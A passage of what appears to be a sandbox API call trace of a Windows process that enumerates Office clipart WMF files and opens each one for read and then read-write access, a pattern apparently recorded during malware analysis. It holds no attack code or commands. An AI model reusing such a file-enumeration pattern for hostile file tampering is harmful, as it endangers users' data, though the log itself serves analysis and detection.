ftLastAccessTime.dwLowDateTime=0xd790bed, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd790bed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb90, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD01152_.WMF", cAlternateFileName="")) returned 1 [0104.065] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.065] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.065] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.065] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.065] AreFileApisANSI () returned 1 [0104.065] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01152_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01152_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.065] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.065] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.065] AreFileApisANSI () returned 1 [0104.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.065] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01152_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01152_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.065] GetFileType (hFile=0x33c) returned 0x1 [0104.065] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.065] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.066] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.066] CloseHandle (hObject=0x33c) returned 1 [0104.066] AreFileApisANSI () returned 1 [0104.066] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.066] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01152_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01152_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.066] GetFileType (hFile=0x33c) returned 0x1 [0104.066] CloseHandle (hObject=0x33c) returned 1 [0104.066] AreFileApisANSI () returned 1 [0104.066] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.066] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01152_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01152_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd790bed, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd790bed, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd790bed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb90)) returned 1 [0104.066] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.066] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.067] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd790bed, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd790bed, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd790bed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe04, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD01157_.WMF", cAlternateFileName="")) returned 1 [0104.067] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.067] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.067] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.067] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.067] AreFileApisANSI () returned 1 [0104.067] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01157_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01157_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.067] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.067] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.067] AreFileApisANSI () returned 1 [0104.067] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.067] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01157_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01157_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.068] GetFileType (hFile=0x33c) returned 0x1 [0104.068] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.069] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.069] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.069] CloseHandle (hObject=0x33c) returned 1 [0104.069] AreFileApisANSI () returned 1 [0104.069] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.069] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01157_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01157_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.069] GetFileType (hFile=0x33c) returned 0x1 [0104.069] CloseHandle (hObject=0x33c) returned 1 [0104.069] AreFileApisANSI () returned 1 [0104.069] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.070] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01157_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01157_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd790bed, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd790bed, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd790bed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe04)) returned 1 [0104.070] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.070] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.070] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb96b67, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb96b67, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb96b67, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8b4, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD01160_.WMF", cAlternateFileName="")) returned 1 [0104.070] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.070] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.070] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.070] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.070] AreFileApisANSI () returned 1 [0104.070] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01160_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01160_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.070] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.070] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.070] AreFileApisANSI () returned 1 [0104.070] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.070] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01160_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01160_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.071] GetFileType (hFile=0x33c) returned 0x1 [0104.071] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.071] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.071] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.071] CloseHandle (hObject=0x33c) returned 1 [0104.071] AreFileApisANSI () returned 1 [0104.071] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.072] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01160_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01160_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.072] GetFileType (hFile=0x33c) returned 0x1 [0104.072] CloseHandle (hObject=0x33c) returned 1 [0104.072] AreFileApisANSI () returned 1 [0104.072] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.072] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01160_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01160_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb96b67, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb96b67, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb96b67, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8b4)) returned 1 [0104.072] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.072] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.072] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdbe306f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8fc, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD01162_.WMF", cAlternateFileName="")) returned 1 [0104.072] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.072] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.072] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.072] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.072] AreFileApisANSI () returned 1 [0104.072] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01162_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01162_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.072] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.072] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.072] AreFileApisANSI () returned 1 [0104.072] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.072] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01162_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01162_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.073] GetFileType (hFile=0x33c) returned 0x1 [0104.073] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.073] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.073] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.073] CloseHandle (hObject=0x33c) returned 1 [0104.073] AreFileApisANSI () returned 1 [0104.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.073] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01162_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01162_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.074] GetFileType (hFile=0x33c) returned 0x1 [0104.074] CloseHandle (hObject=0x33c) returned 1 [0104.074] AreFileApisANSI () returned 1 [0104.074] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.074] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01162_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01162_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdbe306f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8fc)) returned 1 [0104.074] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.074] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.074] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb96b67, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb96b67, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb96b67, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8fc, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD01163_.WMF", cAlternateFileName="")) returned 1 [0104.074] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.074] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.074] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.074] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.074] AreFileApisANSI () returned 1 [0104.074] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01163_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01163_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.074] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.074] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.074] AreFileApisANSI () returned 1 [0104.074] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.074] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01163_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01163_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.075] GetFileType (hFile=0x33c) returned 0x1 [0104.075] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.075] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.075] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.075] CloseHandle (hObject=0x33c) returned 1 [0104.075] AreFileApisANSI () returned 1 [0104.075] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.075] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01163_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01163_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.075] GetFileType (hFile=0x33c) returned 0x1 [0104.075] CloseHandle (hObject=0x33c) returned 1 [0104.076] AreFileApisANSI () returned 1 [0104.076] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.076] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01163_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01163_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb96b67, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb96b67, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb96b67, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8fc)) returned 1 [0104.076] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.076] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb96b67, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb96b67, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb96b67, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x820, dwReserved0=0x313f518, 